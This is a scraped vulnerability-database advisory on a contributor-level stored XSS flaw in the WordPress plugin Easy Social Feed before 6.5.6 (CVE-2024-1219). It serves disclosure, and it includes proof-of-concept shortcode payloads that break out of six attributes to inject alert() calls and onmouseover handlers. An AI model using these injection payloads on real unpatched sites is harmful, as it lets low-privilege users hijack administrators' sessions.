Lucene search
Dmitrii IgnatyevWPEX-ID:CE4AC9C4-D293-4464-B6A0-82DDF8D4860BHistoryMar 27, 2024 - 12:00 a.m.
Easy Social Feed < 6.5.6 - Contributor+ Stored XSS
2024-03-2700:00:00
Dmitrii Ignatyev
24
contributor stored xss fb_appid locale animate_effect fanpage_url box_width box_height exploit
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin
Attributes fb_appid and locale (fixed in 6.5.4):
[efb_likebox fb_appid='1234"; alert(/fb_appid/); asd ="' locale='1234"; alert(/locale/); asd ="']
Attribute animate_effect:
[efb_likebox animate_effect='1234" onmouseover="alert(/animate_effect/)" style="height: 50px; border-style: solid" "']
Attribute fanpage_url:
[efb_likebox fanpage_url='http://example.com/awesome/page/" onmouseover=alert("fanpage_url") style="height: 50px; border-style: solid" "']
Attribute box_width:
[efb_likebox box_width='1234" onmouseover="alert(/box_width/)" style="height: 50px; border-style: solid" "']
Attribute box_height:
[efb_likebox box_height='1234" onmouseover="alert(/box_height/)" style="height: 50px; border-style: solid" "']References
Related
wpvulndb
wpvulndb
Easy Social Feed < 6.5.6 - Contributor+ Stored XSS
2024-03-27 00:00:00
cve
cve
CVE-2024-1219
2024-04-17 05:15:48
cvelist
cvelist
CVE-2024-1219 Easy Social Feed < 6.5.6 - Contributor+ Stored XSS
2024-04-17 05:00:02
wordfence
wordfence
6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
8.7%
Related for WPEX-ID:CE4AC9C4-D293-4464-B6A0-82DDF8D4860B